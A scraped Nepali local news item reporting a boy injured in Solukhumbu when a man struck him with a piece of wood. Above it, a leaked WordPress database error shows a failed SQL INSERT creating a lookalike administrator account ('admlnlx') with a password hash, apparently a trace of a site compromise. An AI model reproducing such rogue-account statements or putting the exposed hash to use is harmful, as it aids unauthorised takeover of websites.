WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bjz8ZjGkdKq969mJUKUACwVpleCgGd0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 14:36:59', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । सोलुदुधकुण्ड नगरापालिका वडा नम्बर २ फेरामा चिरपट प्रहारबाट १ बालक घाइते भएका छन ।
२९ वर्षिया कान्छा शेर्पाले शनिबार चिरपट प्रहार गर्दा १२ वर्षिया बाल घाइते भएको सोलुखुम्बु प्रहरीले जनाएको छ ।
घाइते बालकको टाउको तथा शरिरका अन्य भागमा चोट लागेकाले जिल्ला अस्पताल फाप्लुले थप उपचारको लागि काठमाडौ रेफर गरेको जिल्ला प्रहरी कार्यालय सोलुखुम्बुले जनाएको छ । चिरपट प्रहार गर्ने शेर्पालाई प्रहरीले नियन्त्रणमा लिइसकेको जनाएको छ ।
साभार: सोलु एफ एम